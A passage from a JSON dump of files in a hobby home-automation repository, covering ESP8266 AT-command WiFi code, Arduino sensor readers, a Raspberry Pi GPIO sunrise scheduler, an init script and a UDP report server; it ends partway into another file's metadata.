_cell.println(\"AT+CWSAP?\");\n DBG(\"AT+CWSAP?\");\n String data;\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"ERROR\") != -1 ) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CWSAP?\",\"\");\n data.replace(\"+CWSAP\",\"mySAP\");\n data.replace(\"OK\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n/*************************************************************************\nConfigure the parameter of SSID, password, channel, encryption in AP mode\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\n\nboolean WIFI::confSAP(String ssid , String pwd , byte chl , byte ecn)\n{\n boolean result = false;\n unsigned long start;\n String cmd = \"AT+CWSAP=\\\"\";\n cmd += ssid;\n cmd += \"\\\",\\\"\";\n cmd += pwd;\n cmd += \"\\\",\";\n cmd += chl;\n cmd += \",\";\n cmd += ecn;\n _cell.println(cmd);\n DBG(cmd);\n start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if (_cell.find(\"OK\")) {\n result = true;\n break;\n }\n }\n return result;\n}\n\n\n/*********************************************\n *********************************************\n *********************************************\n TPC/IP Function Command\n *********************************************\n *********************************************\n *********************************************\n */\n\n/*************************************************************************\nInquire connection status\n\n return: string of connection status\n <ID> 0-4\n <type> TCP or UDP\n <addr> IP\n <port> port number\n\n***************************************************************************/\n\nString WIFI::showStatus(void)\n{\n _cell.println(\"AT+CIPSTATUS\");\n DBG(\"AT+CIPSTATUS\");\n String data;\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CIPSTATUS\",\"\");\n data.replace(\"OK\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n/*************************************************************************\nShow the current connection mode (single or multiple)\n\n return: string of connection mode\n 0 - single\n 1 - multiple\n\n***************************************************************************/\nString WIFI::showMux(void)\n{\n String data;\n _cell.println(\"AT+CIPMUX?\");\n DBG(\"AT+CIPMUX?\");\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CIPMUX?\",\"\");\n data.replace(\"+CIPMUX\",\"showMux\");\n data.replace(\"OK\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n/*************************************************************************\nConfigure connection mode (single or multiple)\n\n useMultiConn: if multiple connection mode should be used\n false - use single connection mode\n true - use multiple connection mode\n\n return:\n true - successfully\n false - unsuccessfully\n***************************************************************************/\nboolean WIFI::confMux(boolean useMultiConn)\n{\n String cmd = \"AT+CIPMUX=\";\n cmd += useMultiConn;\n _cell.println(cmd);\n DBG(cmd);\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if (_cell.find(\"OK\")) {\n return true;\n }\n }\n return false;\n}\n\n\n/*************************************************************************\nSet up TCP or UDP connection for single connection mode.\n\n type: TCP or UDP\n\n addr: IP address\n\n port: port number\n\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::newMux(byte type, String addr, int port)\n{\n String data;\n _cell.print(\"AT+CIPSTART=\");\n if(type>0)\n {\n _cell.print(\"\\\"TCP\\\"\");\n }else\n {\n _cell.print(\"\\\"UDP\\\"\");\n }\n _cell.print(\",\");\n _cell.print(\"\\\"\");\n _cell.print(addr);\n _cell.print(\"\\\"\");\n _cell.print(\",\");\n// _cell.print(\"\\\"\");\n _cell.println(String(port));\n// _cell.println(\"\\\"\");\n unsigned long start;\n start = millis();\n while (millis()-start<ESP8266_TIMEOUT) {\n if(_cell.available()>0)\n {\n char a = (char) _cell.read();\n data=data+a;\n }\n if (data.indexOf(\"OK\")!=-1 || data.indexOf(\"ALREAY CONNECT\")!=-1 || data.indexOf(\"ERROR\")!=-1)\n {\n return true;\n }\n }\n return false;\n}\n/*************************************************************************\nSet up TCP or UDP connection (multiple connection mode)\n\n type: TCP or UDP\n\n addr: IP address\n\n port: port number\n\n id: id number(0-4)\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::newMux(byte id, byte type, String addr, int port)\n{\n\n _cell.print(\"AT+CIPSTART=\");\n _cell.print(\"\\\"\");\n _cell.print(String(id));\n _cell.print(\"\\\"\");\n if(type>0)\n {\n _cell.print(\"\\\"TCP\\\"\");\n }\n else\n {\n _cell.print(\"\\\"UDP\\\"\");\n }\n _cell.print(\",\");\n _cell.print(\"\\\"\");\n _cell.print(addr);\n _cell.print(\"\\\"\");\n _cell.print(\",\");\n// _cell.print(\"\\\"\");\n _cell.println(String(port));\n// _cell.println(\"\\\"\");\n String data;\n unsigned long start;\n start = millis();\n while (millis()-start<ESP8266_TIMEOUT) {\n if(_cell.available()>0)\n {\n char a = (char) _cell.read();\n data=data+a;\n }\n if (data.indexOf(\"OK\")!=-1 || data.indexOf(\"ALREAY CONNECT\")!=-1 )\n {\n return true;\n }\n }\n return false;\n\n\n}\n/*************************************************************************\nSend data in single connection mode\n\n str: string of message\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::Send(String str)\n{\n _cell.print(\"AT+CIPSEND=\");\n// _cell.print(\"\\\"\");\n _cell.println(str.length());\n// _cell.println(\"\\\"\");\n unsigned long start;\n start = millis();\n bool found;\n while (millis()-start<5000) {\n if(_cell.find(\">\")==true )\n {\n found = true;\n break;\n }\n }\n if(found)\n _cell.print(str);\n else\n {\n closeMux();\n return false;\n }\n\n\n String data;\n start = millis();\n while (millis()-start<5000) {\n if(_cell.available()>0)\n {\n char a = (char) _cell.read();\n data=data+a;\n }\n if (data.indexOf(\"SEND OK\")!=-1)\n {\n return true;\n }\n }\n return false;\n}\n\n/*************************************************************************\nSend data in multiple connection mode\n\n id: <id>(0-4)\n\n str: string of message\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::Send(byte id, String str)\n{\n _cell.print(\"AT+CIPSEND=\");\n\n _cell.print(String(id));\n _cell.print(\",\");\n _cell.println(str.length());\n unsigned long start;\n start = millis();\n bool found;\n while (millis()-start<5000) {\n if(_cell.find(\">\")==true )\n {\n found = true;\n break;\n }\n }\n if(found)\n _cell.print(str);\n else\n {\n closeMux(id);\n return false;\n }\n\n\n String data;\n start = millis();\n while (millis()-start<5000) {\n if(_cell.available()>0)\n {\n char a = (char) _cell.read();\n data=data+a;\n }\n if (data.indexOf(\"SEND OK\")!=-1)\n {\n return true;\n }\n }\n return false;\n}\n\n/*************************************************************************\nClose up TCP or UDP connection for single connection mode.\n***************************************************************************/\nvoid WIFI::closeMux(void)\n{\n _cell.println(\"AT+CIPCLOSE\");\n\n String data;\n unsigned long start;\n start = millis();\n while (millis()-start<ESP8266_TIMEOUT) {\n if(_cell.available()>0)\n {\n char a = (char) _cell.read();\n data=data+a;\n }\n if (data.indexOf(\"Linked\")!=-1 || data.indexOf(\"ERROR\")!=-1 || data.indexOf(\"we must restart\")!=-1)\n {\n break;\n }\n }\n}\n\n\n/*************************************************************************\nSet up TCP or UDP connection for multiple connection mode.\n\n id: connection ID number(0-4)\n***************************************************************************/\nvoid WIFI::closeMux(byte id)\n{\n _cell.print(\"AT+CIPCLOSE=\");\n _cell.println(String(id));\n String data;\n unsigned long start;\n start = millis();\n while (millis()-start<ESP8266_TIMEOUT) {\n if(_cell.available()>0)\n {\n char a = (char) _cell.read();\n data=data+a;\n }\n if (data.indexOf(\"OK\")!=-1 || data.indexOf(\"Link is not\")!=-1 || data.indexOf(\"Cant close\")!=-1)\n {\n break;\n }\n }\n\n}\n\n/*************************************************************************\nShow current IP address\n\n return: IP address as a String\n\n***************************************************************************/\nString WIFI::showIP(void)\n{\n String data;\n unsigned long start;\n _cell.println(\"AT+CIFSR\");\n start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n while(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"AT+CIFSR\") != -1) {\n break;\n }\n }\n DBG(data);\n data.replace(\"AT+CIFSR\",\"\");\n while (data.indexOf(_newline) != -1) {\n data.replace(_newline, \"\");\n }\n DBG(data);\n return data;\n}\n\n/*************************************************************************\nSet server parameters\n\n mode:\n 0 - close server mode\n 1 - open server mode\n\n port: <port>\n\n return:\n true - successfully\n false - unsuccessfully\n\n***************************************************************************/\nboolean WIFI::confServer(byte mode, int port)\n{\n String data;\n boolean result = false;\n String cmd = \"AT+CIPSERVER=\";\n cmd += mode;\n cmd += \",\";\n cmd += port;\n _cell.println(cmd);\n DBG(cmd);\n\n unsigned long start = millis();\n while (millis()-start < ESP8266_TIMEOUT) {\n if(_cell.available()) {\n data += (char) _cell.read();\n }\n if (data.indexOf(\"OK\") != -1 || data.indexOf(\"no charge\") != -1) {\n result = true;\n break;\n }\n }\n return result;\n}\n"
},
{
"alpha_fraction": 0.5483871102333069,
"alphanum_fraction": 0.5483871102333069,
"avg_line_length": 31,
"blob_id": "86f273cd82e8dbeb7ff49b990e5987794cfd0593",
"content_id": "d23d75de2447718bf755887e197e3d3740704636",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 1,
"path": "/WifiCar/SerialProtocol/tests/__init__.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "__all__ = ['testProtocol.py', ]"
},
{
"alpha_fraction": 0.41237112879753113,
"alphanum_fraction": 0.43170103430747986,
"avg_line_length": 28.846153259277344,
"blob_id": "eff2dfab317cd4d81e26eebec8fc52602ec3a080",
"content_id": "6a230bf69339f0e2b82fb7cc4e0ba2b11ea0aa44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 776,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 26,
"path": "/WifiCar/debug.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\nimport serial\nimport os\n\nif __name__ == '__main__':\n if 'windows' in ' '.join(os.uname()).lower():\n ser = serial.Serial(port=4, baudrate=19200)\n else:\n ser = serial.Serial('/dev/ttyUSB0', 19200)\n while True:\n x = input('--> ')\n ser.write(bytes(x.encode('ascii')))\n while True:\n line = ser.readline()\n decoded = False\n while not decoded:\n try:\n line = line.decode('ascii')\n decoded = True\n except UnicodeDecodeError:\n if len(line) > 0:\n line = line[1:]\n else:\n break\n if decoded:\n print('Nano: ', line)\n"
},
{
"alpha_fraction": 0.6041379570960999,
"alphanum_fraction": 0.6206896305084229,
"avg_line_length": 23.16666603088379,
"blob_id": "fdde926c1ab0769ecf546a77b114c284a301d173",
"content_id": "1ea9a15b520c277a50587e09e4ca59d53fe6c252",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 30,
"path": "/pysmarthouse_service",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n# /etc/init.d/pysmarthouse_service\n\n### BEGIN INIT INFO\n# Provides: pysmarthouse_service\n# Required-Start: $remote_fs $syslog\n# Required-Stop: $remote_fs $syslog\n# Default-Start: 2 3 4 5\n# Default-Stop: 0 1 6\n# Short-Description: Smart house control by Python 3\n# Description: This service is used to control house applications.\n### END INIT INFO\n\n\ncase \"$1\" in \n start)\n echo \"Starting pysmarthouse_service\"\n /home/pi/git/pysmarthouse/pysmarthouse.sh\n ;;\n stop)\n echo \"Stopping pysmarthouse_service\"\n killall python3\n ;;\n *)\n echo \"Usage: /etc/init.d/pysmarthouse_service start|stop\"\n exit 1\n ;;\nesac\n\nexit 0\n"
},
{
"alpha_fraction": 0.5722430348396301,
"alphanum_fraction": 0.577409565448761,
"avg_line_length": 46.168067932128906,
"blob_id": "04f06b110ced9b507a6ee7c0fbcd0dac3e21e43f",
"content_id": "1a18432f4ab23eafc9e856e8b72bd145b14509de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5613,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 119,
"path": "/GpioOnSunSchedule/GpioOnSunSchedule.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"A class to keep GPIO pin level according to sunlight calculation.\"\n\nimport datetime\nimport signal\nfrom time import sleep\nfrom sys import exit\nimport atexit\nimport argparse\nfrom astral import Astral\ntry:\n import RPi.GPIO as GPIO\nexcept RuntimeError:\n exit(\"Error importing RPi.GPIO! Try to run it as root!\")\n\nclass GpioOnSunSchedule:\n def __init__(self, city, gpio_pin, value_during_sun=False, default_value=True, interval=60, debug=False):\n '''\n Initialize a GpioOnSunSchedule object, with\n @city(String): name of your city\n @gpio_pin(Integer): GPIO output pin number on Raspberry Pi board (by board numbering)\n @value_during_sun: GPIO.LOW or GPIO.HIGH (False or True). Value of given pin when sun is in sky.\n @default_value: GPIO.LOW or GPIO.HIGH (False or True). Default value when GPIO pin is initialized. This can be used to avoid\n jitter (e.g. for low-triggering relays)\n @interval(Integer): time interval in seconds between two adjacent check.\n @debug(Boolean): whether to print debug information\n '''\n # Initialize Astral for sunrise/sunset time calculation\n self.astral = Astral()\n self.astral.solar_depression = 'civil'\n try:\n self.city = self.astral[city]\n except KeyError as err:\n exit('%s is not in Astral database. Try your capital city.' % city)\n # Initialize GPIO\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n # Save parameters for later usage\n self.gpio_pin = gpio_pin\n self.value_during_sun = value_during_sun\n self.default_value = default_value\n self.interval = interval # seconds\n self.debug = debug\n def __run(self):\n '''\n 'run' forever and set given GPIO pin to suitable value according to whether sun is up or not.\n '''\n current_value = self.default_value\n if self.debug:\n print(\"Setup GPIO pin {0} to OUT with initial value {1}.\".format(self.gpio_pin, current_value))\n GPIO.setup(self.gpio_pin, GPIO.OUT, initial=current_value)\n while True:\n # loop forever\n sun = self.city.sun(date=datetime.date.today(), local=True)\n sunrise, sunset = sun['sunrise'], sun['sunset']\n now = datetime.datetime.now(tz=sunrise.tzinfo)\n if self.debug:\n print(\"Today is {0}\".format(sun))\n print(\"Sunrise at {0}\".format(sunrise))\n print(\"Sunset at {0}\".format(sunset))\n print(\"Now is {0}\".format(now))\n if now > sunrise + datetime.timedelta(hours=0.5) and now < sunset - datetime.timedelta(hours=0.5):\n # sun is in the sky\n if self.debug:\n print(\"Sun is in the sky! GPIO pin #{0} is {1}.\".format(self.gpio_pin, current_value))\n if current_value != self.value_during_sun:\n current_value = self.value_during_sun\n GPIO.output(self.gpio_pin, current_value)\n if self.debug:\n print(\"Switch GPIO pin #{0} to {1}.\".format(self.gpio_pin, current_value))\n else:\n # sun is down\n if self.debug:\n print(\"Sun is down! GPIO pin #{0} is {1}.\".format(self.gpio_pin, current_value))\n if current_value == self.value_during_sun:\n current_value = not self.value_during_sun\n GPIO.output(self.gpio_pin, current_value)\n if self.debug:\n print(\"Switch GPIO pin #{0} to {1}.\".format(self.gpio_pin, current_value))\n if self.debug:\n print(\"Sleep {0} seconds...\".format(self.interval))\n sleep(self.interval)\n def run(self):\n try:\n self.__run()\n except KeyboardInterrupt:\n pass\n finally:\n self.clean()\n def clean(self):\n GPIO.cleanup()\n\ndef handler(signum, frame):\n o = frame.f_globals['gpioOnSunSchedule']\n o.clean()\n\nsignal.signal(signal.SIGTERM, handler)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--debug\", help=\"Enable debug output\", action=\"store_true\")\n parser.add_argument(\"-c\", \"--city\", help=\"Nearest capital city name\", type=str, default=\"Stockholm\")\n parser.add_argument(\"-p\", \"--pin\", help=\"GPIO pin number (BOARD mode) for output\", type=int, required=True)\n parser.add_argument(\"-s\", \"--sun_value\", help=\"GPIO pin output during sun is up\", type=bool, default=True)\n parser.add_argument(\"-d\", \"--default_value\", help=\"GPIO pin default output value\", type=bool, default=True)\n parser.add_argument(\"-i\", \"--interval\", help=\"Sleep time before wake up again to change GPIO output\", type=int, default=300)\n args = parser.parse_args()\n if args.debug:\n print(\"city is {0}\".format(args.city))\n print(\"GPIO pin is #{0}\".format(args.pin))\n print(\"sun_value is {0}\".format(args.sun_value))\n print(\"default_value is {0}\".format(args.default_value))\n gpioOnSunSchedule = GpioOnSunSchedule(args.city,\n args.pin,\n value_during_sun=args.sun_value,\n default_value=args.default_value,\n interval=args.interval,\n debug=args.debug)\n gpioOnSunSchedule.run()\n"
},
{
"alpha_fraction": 0.47194719314575195,
"alphanum_fraction": 0.5302530527114868,
"avg_line_length": 28.322580337524414,
"blob_id": "4e670b2097932858c7617d3a52d8676e2a006514",
"content_id": "2ade56e86e0fb19dd744a81eb3212952f8efe667",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 909,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 31,
"path": "/WifiCar/PiPin.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/* To save digital pin usage on Arduino, this library assumes analog pins\n are used instead.\n*/\n#include \"PiPin.h\"\n\n/****************************************************************************/\n\nPiPin::PiPin(int _in0, int _in1, int _in2):\n in0(_in0), in1(_in1), in2(_in2)\n{\n}\n\nvoid PiPin::init() {\n pinMode(in0, INPUT_PULLUP);\n pinMode(in1, INPUT_PULLUP);\n pinMode(in2, INPUT_PULLUP);\n}\n\nint PiPin::read() {\n byte first_read, second_read;\n boolean is_jitter = true;\n while (is_jitter) {\n first_read = (analogRead(in0)>512?1:0) | ((analogRead(in1)>512?1:0) << 1) | ((analogRead(in2)>512?1:0) << 2);\n delay(1);\n second_read = (analogRead(in0)>512?1:0) | ((analogRead(in1)>512?1:0) << 1) | ((analogRead(in2)>512?1:0) << 2);\n if (first_read == second_read) {\n is_jitter = false;\n }\n }\n return PIPIN_TO_PROTOCOL_OP_CODES[first_read];\n}\n"
},
{
"alpha_fraction": 0.545045018196106,
"alphanum_fraction": 0.5810810923576355,
"avg_line_length": 22.38596534729004,
"blob_id": "160d11e69971b5401d90f128d3617f61314137a6",
"content_id": "ebebf8578861c461aab06137210adda4fd29bc2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1332,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 57,
"path": "/LcdDisplay/TemperatureSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n \n#include \"TemperatureSensor.h\"\n\nfloat get_temperature(OneWire* ds_p){\n //returns the temperature from one DS18S20 in DEG Celsius\n\n byte data[12];\n byte addr[8];\n\n if (!ds_p->search(addr))\n {\n //no more sensors on chain, reset search\n ds_p->reset_search();\n return -1000;\n }\n\n if (OneWire::crc8( addr, 7) != addr[7])\n {\n //Serial.println(\"CRC is not valid!\");\n return -1000;\n }\n\n if ( addr[0] != 0x10 && addr[0] != 0x28)\n {\n //Serial.print(\"Device is not recognized\");\n return -1000;\n }\n\n ds_p->reset();\n ds_p->select(addr);\n ds_p->write(0x44,1); // start conversion, with parasite power on at the end\n\n byte present = ds_p->reset();\n ds_p->select(addr); \n ds_p->write(0xBE); // Read Scratchpad\n\n for (int i = 0; i < 9; i++) { // we need 9 bytes\n data[i] = ds_p->read();\n }\n\n ds_p->reset_search();\n\n byte MSB = data[1];\n byte LSB = data[0];\n\n float tempRead = ((MSB << 8) | LSB); //using two's compliment\n float TemperatureSum = tempRead / 16;\n\n return TemperatureSum;\n}"
},
{
"alpha_fraction": 0.6266476511955261,
"alphanum_fraction": 0.6469540596008301,
"avg_line_length": 35.441558837890625,
"blob_id": "27a596b6b048414400563099903b0a5c63530c65",
"content_id": "b20d8cee72e125d50c36b320446e805a2ecd70f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2807,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 77,
"path": "/MowerRobot/UltraSonicSensorProxy/UltraSonicSensorProxy.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n UltraSonicSensorProxy uses a Arduino Nano or Pro Mini to connect to ultrasonic sensors etc.\n Then it is connected back to the main Arduino Uno through I2C bus, as a slave.\n\n There are six ultrasonic sensors: head, head-left, head-right, tail, tail-left, \n tail-right. They are seperated 60 degrees from each other.\n\n Connections:\n For all ultrasonic sensors:\n VCC <-> 5V\n GND <-> GND\n head sensor: Trig <-> PIN_D2, Echo <-> PIN_D3\n head-left: Trig <-> PIN_D4, Echo <-> PIN_D5\n head-right: Trig <-> PIN_D6, Echo <-> PIN_D7\n tail sensor: Trig <-> PIN_D8, Echo <-> PIN_D9\n tail-left: Trig <-> PIN_D10, Echo <-> PIN_D11\n tail-right: Trig <-> PIN_D12, Echo <-> PIN_D13\n\n I2C communication protocol:\n Address of this slave: 0x10;\n All distances are measured in centimeter;\n Initial state after boot-up: all thresholds of six sensors are set to maximum\n After boot-up:\n onReceive: two bytes used, the first is sensorIndex, the second is threshold to set\n onRequest: UltraSonicSensorNumber number of bytes returned, sorted by their index\n*/\n\n#include <Arduino.h>\n#include <Wire.h>\n#include \"constants.h\"\n\nuint8_t thresholds[UltraSonicSensorNumber] = {255};\nuint8_t distances[UltraSonicSensorNumber] = {255};\nuint8_t trigPins[UltraSonicSensorNumber];\nuint8_t echoPins[UltraSonicSensorNumber];\n\nvoid setup() {\n Wire.begin(UltraSonicSensorProxyAddress);\n Wire.onReceive(set_threshold);\n Wire.onRequest(get_distances);\n int i;\n for (i=0; i<UltraSonicSensorNumber; i++) {\n trigPins[i] = 2 * i + 2;\n pinMode(trigPins[i], OUTPUT);\n echoPins[i] = 2 * i + 3;\n pinMode(echoPins[i], INPUT);\n }\n}\n\nvoid loop() {\n int sensorIndex;\n unsigned long distance;\n for (sensorIndex=0; sensorIndex<UltraSonicSensorNumber; sensorIndex++) {\n digitalWrite(trigPins[sensorIndex], LOW);\n delayMicroseconds(2);\n digitalWrite(trigPins[sensorIndex], HIGH);\n delayMicroseconds(12);\n digitalWrite(trigPins[sensorIndex], LOW);\n distance = pulseIn(echoPins[sensorIndex], HIGH, UltraSonicSensorTimeOut) / 29 / 2;\n distances[sensorIndex] = distance > 255 ? 255 : (uint8_t)distance;\n }\n delay(60); // do not trigger too frequently\n}\n\nvoid set_threshold(int numBytes) {\n // the first byte identifies which sensor to apply the threshold\n // the second byte tells how much to set as threshold\n uint8_t sensorIndex = Wire.read();\n uint8_t threshold = Wire.read();\n if (sensorIndex < UltraSonicSensorNumber) {\n thresholds[sensorIndex] = threshold;\n }\n}\n\nvoid get_distances() {\n Wire.write(distances, UltraSonicSensorNumber);\n}\n\n"
},
{
"alpha_fraction": 0.6115503907203674,
"alphanum_fraction": 0.6304572224617004,
"avg_line_length": 56.60396194458008,
"blob_id": "b3c5a41e95684a7f9afc6d1c832236d184020383",
"content_id": "b72f47830ce725594469e72a09cc8ebae2516782",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5818,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 101,
"path": "/WebInterface/python/UdpServer.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n'''\nUdpServer class that receives all packets from Arduino's and update database.\n\nAll clients have to follow this format when sending to this server:\n 1. Use UDP\n 2. Port 9999\n 3. Communication protocol (version 0.1):\n 1) syntax (all letters are case sensitive)\n All fields are separated by a \";\", and usage of \";\" within any field is forbidden. A datagram must be ended with an \";\". Each\n field is a ASCII string. The first field is <operation>, which must be one of \"REPORT\" or \"CMD\".\n When <operation>=\"REPORT\", datagram is composed of 1+1+2*n (n=1,2,...) fields in order of \"REPORT\", <ID>, (<type>, <value>)+:\n <ID>: identity of the client, usually a geometry location name of an Arduino, e.g. \"KitchenWindow\", \"FrontYard\"\n <type>: type of report, i.e. what the <value> field in this report refers to, e.g. \"Temperature\", \"InternetConnectivity\"\n <value>: integer in unit of 0.001, e.g. \"-1800\" means -18.00\n Example: \"REPORT;KitchenWindow;Temperature;2300;Relay;100\", means the sender \"KitchenWindow\" reports a temperature at 23.00\n degree Celsius and its relay at value 1.00 (ON).\n When <operation>=\"CMD\", the datagram is composed of a string. Each char in the string represents one command.:\n <cmd>: the command receiver should execute.\n Example: \"CMD;d12ksdi\"\n 2) semantics\n client -> server: only \"REPORT\" operation is supported, e.g. \"REPORT;Doorstep;Temperature;-1900\", means client named \"Doorstep\"\n reports a temperature at -19.00 degree Celsius. How server uses the content of this report is completely up to the server.\n server -> client: only \"CMD\" operation is supported, e.g. \"CMD;d\". Mapping of char and commands:\n char commands/function calls\n d delay(500)\n 3) timing\n A TIMEOUT of 4 seconds is applied to each receiving attempt, if no response is received before timeout, operator should just\n reset its status and try again later (ideally a counter of consecutive timeout should also be maintained).\n Server should always listen, and any operation to handle a incoming datagram should take no more than TIMEOUT/2 in time. Server\n only responses to incoming datagram and then sends a datagram as response.\n Client sends one REPORT datagram to server every PERIOD (=60 second) or when an significant event happened, e.g. LightSensor\n threshold is reached, etc. When client sends a report, it waits for an response which is a \"CMD\" datagram, and executes <cmd>\n in the datagram.\n'''\nimport logging\nimport db\nimport socketserver\nimport argparse\nfrom time import sleep\n\nHOST = \"0.0.0.0\"\nPORT = 9999\nENCODING = \"ASCII\"\ncount = 0\n\nclass RaspberryPiHandler(socketserver.BaseRequestHandler):\n \"\"\"\n Handles one incoming datagram.\n \"\"\"\n def handle(self):\n logging.info(\"On socket({}) received \\\"{}\\\"\".format(self.request[1], self.request[0]))\n logging.debug(\"type(self.request[0])={}\".format(type(self.request[0])))\n datagram = self.request[0].decode(encoding=ENCODING).strip().split(';')\n for i in range(datagram.count('')):\n datagram.remove('') # remove empty items\n relay = 0\n # check if incoming datagram is legal\n if len(datagram) < 1 + 1 + 2: # minimum datagram: \"<operation>;<ID>;<type>;<value>\"\n logging.warning(\"Incoming datagram is too short (len={})! {}\".format(len(datagram), ';'.join(datagram)))\n elif datagram[0] != \"REPORT\": # only <operation>=\"REPORT\" is supported for client->server communication\n logging.debug(\"<operation>={}\".format(datagram[0]))\n logging.warning(\"Incoming datagram has unsupported <operation>=\\\"{}\\\"! {}\".format(datagram[0], ';'.join(datagram)))\n elif (len(datagram) - 2) % 2 != 0: # <type>;<value> are pairs\n logging.debug(datagram)\n logging.warning(\"Incoming datagram has wrong number of fields (len={})! {}\".format(len(datagram), ';'.join(datagram)))\n else: # basic check passed\n logging.info(\"Incoming datagram: {}\".format(';'.join(datagram)))\n operation, id = datagram[0:2]\n type_value_list = datagram[2:]\n for i in range(0, len(type_value_list), 2):\n db.DB().insert(id, type_value_list[i], float(type_value_list[i+1])/10000)\n if type_value_list[0] == \"Relay\":\n relay = float(type_value_list[1]) / 100\n # send a CMD datagram back\n # TODO: add real logic, for now only empty cmd is sent.\n if relay:\n cmd = \"relay_off();\"\n else:\n cmd = \"relay_on();\"\n socket = self.request[1]\n global count\n count += 1\n cmd = \"CMD;{}\".format(count)\n sleep(0.5)\n socket.sendto(cmd.encode(encoding=ENCODING), self.client_address)\n logging.info(\"Sent \\\"{}\\\"\".format(cmd))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbosity\", help=\"verbosity of logging output [0..4]\", action=\"count\", default=0)\n args = parser.parse_args()\n if args.verbosity > 4:\n args.verbosity = 4\n log_lvl = (logging.CRITICAL, logging.ERROR, logging.WARNING, logging.INFO, logging.DEBUG)[args.verbosity]\n logging.basicConfig(level=log_lvl, format='%(filename)s:%(levelname)s:%(message)s')\n logging.info(\"Starting UdpServer instance...\")\n server = socketserver.UDPServer((HOST, PORT), RaspberryPiHandler)\n logging.info(\"UdpServer instance started.\")\n logging.info(\"Let UdpServer to serve forever ...\")\n server.serve_forever()\n"
},
{
"alpha_fraction": 0.5560298562049866,
"alphanum_fraction": 0.5688366889953613,
"avg_line_length": 16.679244995117188,
"blob_id": "748925a8e0ba0ae48d3870d22fa2826af1844f62",
"content_id": "1f4ca5df6424f56342e804d1c4e072be387e6d0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 937,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 53,
"path": "/lib/Relay/Relay.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
